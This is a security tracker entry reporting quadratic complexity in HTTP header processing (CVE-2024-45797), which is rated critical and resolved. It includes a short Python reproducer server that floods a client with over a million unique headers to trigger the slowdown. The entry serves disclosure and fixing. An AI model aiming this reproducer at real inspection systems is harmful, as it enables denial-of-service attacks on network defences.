Actions
Security #7191
closedhttp: quadratic complexity in headers processing/finding
Git IDs:
Severity:
CRITICAL
Disclosure Date:
Description
Found while creating CTF challenge against curl CVE-2023-38039
Script to create traffic was
import socket
HOST = "127.0.0.1" # Standard loopback interface address (localhost)
PORT = 8001 # Port to listen on (non-privileged ports are > 1023)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.bind((HOST, PORT))
s.listen()
conn, addr = s.accept()
with conn:
print(f"Connected by {addr}")
while True:
data = conn.recv(1024)
if not data:
break
conn.sendall(b"HTTP/1.1 200 OK\n")
for i in range(1024*1024):
conn.sendall(b"Name%d: value%d\n" % (i, i))
Most time is spent in htp_process_response_header_generic. doing the htp_table_get
Files
Updated by Philippe Antoine 3 months ago
- File curlinf2.pcapng curlinf2.pcapng added
- Label Needs backport to 7.0 added
Smaller reproducer
This was not found by quadfuzz, because there needs to be a massive copy/paste but with each getting a small unique mutation...
Updated by Philippe Antoine 3 months ago
- Status changed from New to Assigned
I guess the simple solution is to add a limit to the number of headers
Updated by Victor Julien about 1 month ago
- Related to Task #7246: libhtp 0.5.49 added
Updated by Victor Julien about 1 month ago
- Severity changed from MODERATE to CRITICAL
CRITICAL is it is a trivial action that the client can initiate.
Updated by Juliana Fajardini Reichow about 1 month ago
- CVE set to 2024-45797
Updated by Philippe Antoine 17 days ago
- Status changed from In Review to Resolved
Actions